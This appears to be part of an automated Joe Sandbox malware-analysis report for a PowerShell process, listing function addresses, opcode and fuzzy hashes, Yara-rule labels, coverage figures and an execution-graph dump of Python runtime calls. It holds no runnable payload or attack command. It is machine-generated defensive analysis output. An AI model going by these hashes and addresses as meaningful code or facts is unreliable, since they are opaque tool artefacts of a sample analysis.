                                                                                                                                                                                                      Function 00007FF848F4A058 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0a885ebbb34128233b932a45151e857c8288b9c451269d0434030800931384e2
                                                                                                                                                                                                      • Instruction ID: a695b706cd7cf4087704325fdc7e032b0a33b1f0b5da6935a5e1761c5483b2b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a885ebbb34128233b932a45151e857c8288b9c451269d0434030800931384e2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD418031E0C94E4FEBA8FB68A4053B976D1EF68BA0F00057AD41DE32C6DF2958558785
                                                                                                                                                                                                      Function 00007FF848F4A088 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a5911f55c05b69001b857e97da1b220bbd2ab680532a8bcfa49bad1f2b4fbb4a
                                                                                                                                                                                                      • Instruction ID: b25737354b10b4c9657822409d870afd0ef9af23620c30ba860808a89cdd81d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5911f55c05b69001b857e97da1b220bbd2ab680532a8bcfa49bad1f2b4fbb4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A319C30E1D9494FDBA8EB2CD854B7577D1EFA9760F1401BAD04ED72D6DA18AC82C780
                                                                                                                                                                                                      Function 00007FF849011104 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2455308057.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: eee37d81bf8c704e0d015cab6656a0a0d8f7d502a84a52db3cc858d433013160
                                                                                                                                                                                                      • Instruction ID: b46bc9cb57bf81b6e5734ea995c0ef311d886a9efae097dcaeb9b4249adcc10e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee37d81bf8c704e0d015cab6656a0a0d8f7d502a84a52db3cc858d433013160
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97311522D0FAC68FFBEDBA3C14665B8AAE0EF46695B0801FAD41DC71C3ED0D98444311
                                                                                                                                                                                                      Function 00007FF848F49A10 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 266d6945654e5cc375086c1b85c264c75429a6144629e2bff253f75b994a243f
                                                                                                                                                                                                      • Instruction ID: 8de11ac2b5e90c2ab1f0a005de3e9cb047e5c1916c704061772916216a9f7ddd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 266d6945654e5cc375086c1b85c264c75429a6144629e2bff253f75b994a243f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A317331E0D51D9FE794FB58A4057FA76E1EFA87A0F00053BE40DE32C2CF2968558685
                                                                                                                                                                                                      Function 00007FF8490199B7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2455308057.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 83e25c70e69e45d644254e6e5355ac6a94808fdbefec4950c76f6b3ed100c70d
                                                                                                                                                                                                      • Instruction ID: a1388e8371ac735b421b133b4c32dafbc6d9fc361c378373afb5029584c4b613
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83e25c70e69e45d644254e6e5355ac6a94808fdbefec4950c76f6b3ed100c70d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B31D825E1EAC78FFBB9AB2C245217825D1EF512E1B8800BAD41DC71D7ED1EE8484341
                                                                                                                                                                                                      Function 00007FF848F4CF91 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 8e8ff1042924eb904b5e65b79fb6349ab9d1068d45de02d09bd71d1dc006427e
                                                                                                                                                                                                      • Instruction ID: 274338d39831f22e0f729613a6d26113bddec8c3327f4c093d907052d5ea1b17
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e8ff1042924eb904b5e65b79fb6349ab9d1068d45de02d09bd71d1dc006427e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72219D30628E489FCB98EB3CC49496573E1FF6931574505AED08BC7AA2DA25FC82CB00
                                                                                                                                                                                                      Function 00007FF848F4E4C1 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 804beaca4d1aafe0631bc4a17d4c065a8df7a7094d2fc7c87e5b2f5233f60f29
                                                                                                                                                                                                      • Instruction ID: 1f9427b09a17fefc7e38eeaa1934b87a90b551a8737eae435d21e4e0cedf7040
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 804beaca4d1aafe0631bc4a17d4c065a8df7a7094d2fc7c87e5b2f5233f60f29
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4911303160D9884FD795EB3CD8589647FE1EF6935170905F7E488CB1B6EA15DC80C741
                                                                                                                                                                                                      Function 00007FF848F4AF98 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a09f623c616d2da45831b2ebcb5b9a64f7784d2700079c1ab76743524be81c7c
                                                                                                                                                                                                      • Instruction ID: be8a437838cc2b8d8a50fe7b2b5880405e8b7c3d3ee8a19e16520514e25ff2e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a09f623c616d2da45831b2ebcb5b9a64f7784d2700079c1ab76743524be81c7c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B11C03071CC1C4FE7A8EB5CE858AA577D1EBA8721B1101AAF04DC72A6DE21DC928784
                                                                                                                                                                                                      Function 00007FF848F4E118 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a2085566ccea63a860e49cc7246e5076fb6e5775a97ab26853c0882d008d6f8b
                                                                                                                                                                                                      • Instruction ID: ac1ff222b0310e6d9d1ae2df98eaed00a48df8b02e0d285cc83feac2480e3e4f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2085566ccea63a860e49cc7246e5076fb6e5775a97ab26853c0882d008d6f8b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21118832A4C9894FD712B7349C108E63BA5EFD7360F0401EBD00AC72D2DA295D56C391
                                                                                                                                                                                                      Function 00007FF848F49D02 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 87d90c4d099dd70797e3b69bd27b03a9b2d8b169c34cd818d1e5e49a34e82af8
                                                                                                                                                                                                      • Instruction ID: 9d5582b387c0620832e2c7689ff68d057b6821d03a40fcc5c23e7dba913d2554
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87d90c4d099dd70797e3b69bd27b03a9b2d8b169c34cd818d1e5e49a34e82af8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1501B572F0C6094FE76CAA4C78022B973D1E799A64F00023FE48FD36D2DE256C03418A
                                                                                                                                                                                                      Function 00007FF848F49D16 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ddab1351ef593edbffbf37c849ee5ca3571517001f140cfbf05003a7df411d1c
                                                                                                                                                                                                      • Instruction ID: 2e0b3ef2a736b30f2a2bae628079bfa15189838e368bae08d5add6a55259c457
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddab1351ef593edbffbf37c849ee5ca3571517001f140cfbf05003a7df411d1c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F01B572F0C6084FE66CAA5C78061B973D1E799A64F00023FE08FD36D2DF256803418A
                                                                                                                                                                                                      Function 00007FF848F4E622 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 51a7a57e683fc3033aa2ae267a85da9b3684e07e8a8673c08c695c6cc4f6fa83
                                                                                                                                                                                                      • Instruction ID: 510af779b60f1c9e5d40d422964bfc186c5503421fd312ea55320ed30e8f0b5e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51a7a57e683fc3033aa2ae267a85da9b3684e07e8a8673c08c695c6cc4f6fa83
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18215E30A0CA894FDB55EB28C454F617BE2EF65354F0845EAD44EDB2E2DA29E881CB50
                                                                                                                                                                                                      Function 00007FF848F49D27 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ea753830ebbaa7a10940cdeb66e389915d10312e8cbbcbfede9d4e3884880604
                                                                                                                                                                                                      • Instruction ID: 4aaaf3ea706344f9094298496d6fe930d3d70073990343cf4c6df2f20476b11e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea753830ebbaa7a10940cdeb66e389915d10312e8cbbcbfede9d4e3884880604
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7017172F0C6094FE65CAA5C78021B973D1E799A64F04023FE18ED3692DE25A803428A
                                                                                                                                                                                                      Function 00007FF848F4B48D Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: f659f72c53198f20b78b751b33bc29a723bed583456afade91c02d78ff43349f
                                                                                                                                                                                                      • Instruction ID: 4a2e4e26690042b9a1df1300247aaa3948deaaff497f850547203b369d57d578
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f659f72c53198f20b78b751b33bc29a723bed583456afade91c02d78ff43349f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E015231F2DD0A4EEA54BBB868122FDA2D1EF98790F44457AD04FD32C7DE2D68024755
                                                                                                                                                                                                      Function 00007FF848F4D8E9 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2019db2a1dddd04e36a0e0cc8a67218d8a193a4b0e7e717773f1fffdd81599d3
                                                                                                                                                                                                      • Instruction ID: 882e4a1ef8b2deacc27cdab63f5ef6e4eb2f1c12eedd325d3ee3a0748093ef56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2019db2a1dddd04e36a0e0cc8a67218d8a193a4b0e7e717773f1fffdd81599d3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4711063181DA8A1EE795FB2840042BA76D1FFA4A40F0845BBC08EE32D2DF2CE5448355
                                                                                                                                                                                                      Function 00007FF848F43945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                      • Instruction ID: 6844502bb12e6936a31c054fe55ce34861744de46e0db52a3f4fb09dbe218d9a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                                                                                                                                      Function 00007FF848F4E0DB Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: f2d4ca5e8990861e9885a0f299c1680ef826718aac856c19443d8bd3fad2b21e
                                                                                                                                                                                                      • Instruction ID: 5f9f81978e012abc030c83bf266894e1c1576811069b3961f7962578add71c37
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2d4ca5e8990861e9885a0f299c1680ef826718aac856c19443d8bd3fad2b21e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45F02236E4C95D4BEB51AAA8BC004A8BBE1EBD9764F08007AE40EE31D1D66A5856C205
                                                                                                                                                                                                      Function 00007FF848F4A0E0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 4ea3aa3f1c61b089f53f19a7df21c456533c4826c5ffd209a39514bc1dc96a12
                                                                                                                                                                                                      • Instruction ID: 44b2f1ef9905b8532c46c7b17465218e6173061bfe659e95b0fe61471736c57b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea3aa3f1c61b089f53f19a7df21c456533c4826c5ffd209a39514bc1dc96a12
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50E06531F1D81909E6FC772D295467511C1EFE4AB1F64057BD52DE21C4EE4C5C825294
                                                                                                                                                                                                      Function 00007FF848F4E749 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: bb68ed9aa59c627d925362ade942aa9cad6041c1d9e7dbf4acd54c69fbfc8752
                                                                                                                                                                                                      • Instruction ID: f36048e9bbbf94ac0f1da7c0560de734c4ebb0c35e6afc5fd22719252b88d560
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb68ed9aa59c627d925362ade942aa9cad6041c1d9e7dbf4acd54c69fbfc8752
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92F05C3190E5D44FD326EB2C8814AA03FF1FF5A350B0944E7D08CCB1A3C6048C0883A2

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00007FF848F4A60E Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 931ed186405384b3769ff952d48f47baf9f8fbabcc8212f44631593305fc61aa
                                                                                                                                                                                                      • Instruction ID: 924046d5e7b1d8324f834710c556a44c2e25d05c46a85d75dd1fd5c0b7003d8d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 931ed186405384b3769ff952d48f47baf9f8fbabcc8212f44631593305fc61aa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EC1F131E1C94A4FE7A9E72C94552B977E2FFA4B80F14017BD04ED36D6DF28A8428344
                                                                                                                                                                                                      Function 00007FF848F486C5 Relevance: 5.2, Strings: 4, Instructions: 198COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: K_^$K_^$K_^$K_^
                                                                                                                                                                                                      • API String ID: 0-4267328068
                                                                                                                                                                                                      • Opcode ID: 6ed2ccb198c5999d59f84729162bb8afc6f9c161808eff4d719ce7b24043afd5
                                                                                                                                                                                                      • Instruction ID: 93f840ff2ae5412aeb24892d8da24d29cb57fbb8b7e4dd1cbc3520a438dbe39c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ed2ccb198c5999d59f84729162bb8afc6f9c161808eff4d719ce7b24043afd5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B361506281E6C25FE35367385C750A57FA0EE23B98F6901FBC0D89A0D3EA19180AD356

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:3.3%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:1.2%
                                                                                                                                                                                                      Total number of Nodes:1173
                                                                                                                                                                                                      Total number of Limit Nodes:159
                                                                                                                                                                                                      execution_graph 34454 6c549e90 34457 6c485b90 34454->34457 34456 6c549ead 34458 6c485ba0 __cftof 34457->34458 34459 6c485ba7 _PyDict_GetItem_KnownHash 34458->34459 34463 6c485bde 34458->34463 34460 6c485bba 34459->34460 34459->34463 34461 6c485bc4 PyType_IsSubtype 34460->34461 34462 6c485bd6 34460->34462 34461->34462 34462->34456 34463->34456 33784 6c58e0d0 33785 6c58e0f9 33784->33785 33786 6c58e151 33785->33786 33808 6c4a61f0 33785->33808 33811 6c5ca596 5 API calls ___raise_securityfailure 33786->33811 33788 6c58e170 33789 6c58e113 33789->33786 33790 6c58e11c PyThread_allocate_lock 33789->33790 33791 6c58e174 33790->33791 33792 6c58e144 33790->33792 33812 6c579ac0 _PyConfig_InitCompatConfig 33791->33812 33792->33786 33793 6c58e148 _PyErr_NoMemory 33792->33793 33793->33786 33795 6c58e21a PyThread_acquire_lock_timed 33797 6c58e29f 33795->33797 33798 6c58e2bf 33795->33798 33797->33798 33801 6c58e2ab _PyErr_SetString 33797->33801 33799 6c58e33a 33798->33799 33800 6c58e30d EnterCriticalSection 33798->33800 33799->33786 33804 6c58e342 33799->33804 33802 6c58e322 ReleaseSemaphore 33800->33802 33803 6c58e333 LeaveCriticalSection 33800->33803 33801->33798 33802->33803 33803->33799 33813 6c5ca596 5 API calls ___raise_securityfailure 33804->33813 33806 6c58e36f 33809 6c4a61fa calloc 33808->33809 33809->33789 33811->33788 33812->33795 33813->33806 33814 6c583cd0 PyLong_FromLong 33815 6c583cef PyModule_AddObjectRef 33814->33815 33816 6c583ce7 33814->33816 33817 6c583d05 33815->33817 34464 6c586f10 34465 6c586f32 34464->34465 34466 6c586f59 34464->34466 34465->34466 34474 6c4a7620 malloc 34465->34474 34467 6c586fa4 __cftof 34466->34467 34468 6c58c540 __cftof 2 API calls 34466->34468 34469 6c586fdc 34468->34469 34470 6c58703b _PyErr_Format 34469->34470 34471 6c586ffe 34469->34471 34472 6c48cfc0 4 API calls 34471->34472 34473 6c58700c 34472->34473 34474->34466 34475 6c582910 34477 6c582931 __cftof 34475->34477 34476 6c5829c1 34477->34476 34486 6c580a10 34477->34486 34479 6c5829bd 34479->34476 34480 6c5829fb 34479->34480 34481 6c5829f2 _Py_hashtable_destroy 34479->34481 34482 6c582a03 _PyBytes_Resize 34480->34482 34483 6c582a1e 34480->34483 34481->34480 34482->34476 34482->34483 34484 6c582a48 __cftof 34483->34484 34485 6c582a55 _PyErr_SetString 34483->34485 34487 6c580ac8 34486->34487 34488 6c580a23 PyMem_Malloc 34486->34488 34487->34479 34489 6c580a5a 34488->34489 34490 6c580a33 PyMem_Malloc 34488->34490 34493 6c580a72 __cftof 34489->34493 34494 6c58c540 __cftof 2 API calls 34489->34494 34491 6c580a51 PyMem_Free 34490->34491 34492 6c580a87 memset 34490->34492 34491->34489 34492->34487 34493->34479 34495 6c580adf 34494->34495 34496 6c58ab10 34497 6c58ab57 34496->34497 34498 6c58ab27 _PyRuntimeState_Init 34496->34498 34500 6c58ab60 34497->34500 34501 6c58ab85 PyInterpreterState_New 34497->34501 34498->34497 34499 6c58ab47 34498->34499 34502 6c58ab9a 34501->34502 34503 6c58abb5 34501->34503 34518 6c58edb0 11 API calls 34502->34518 34505 6c58aba6 34506 6c58abac PyInterpreterState_Delete 34505->34506 34507 6c58abe0 34505->34507 34506->34503 34519 6c579da0 PyConfig_Clear _Py_PreInitializeFromConfig 34507->34519 34509 6c58ac16 34510 6c58ac8f 34509->34510 34645 6c5875f0 14 API calls __cftof 34509->34645 34646 6c5afc40 71 API calls __cftof 34510->34646 34513 6c58aca2 PyThreadState_Clear PyThreadState_Delete PyInterpreterState_Delete 34514 6c58ac3c 34514->34510 34621 6c587f90 34514->34621 34516 6c58ac59 34516->34510 34517 6c58ac88 34516->34517 34517->34503 34518->34505 34520 6c579e43 34519->34520 34523 6c579e2c 34519->34523 34520->34523 34524 6c579e4b _PyMem_RawWcsdup 34520->34524 34521 6c579e37 34521->34509 34522 6c579eae _Py_PreInitializeFromConfig 34526 6c579ee4 34522->34526 34529 6c579ecd 34522->34529 34523->34521 34523->34522 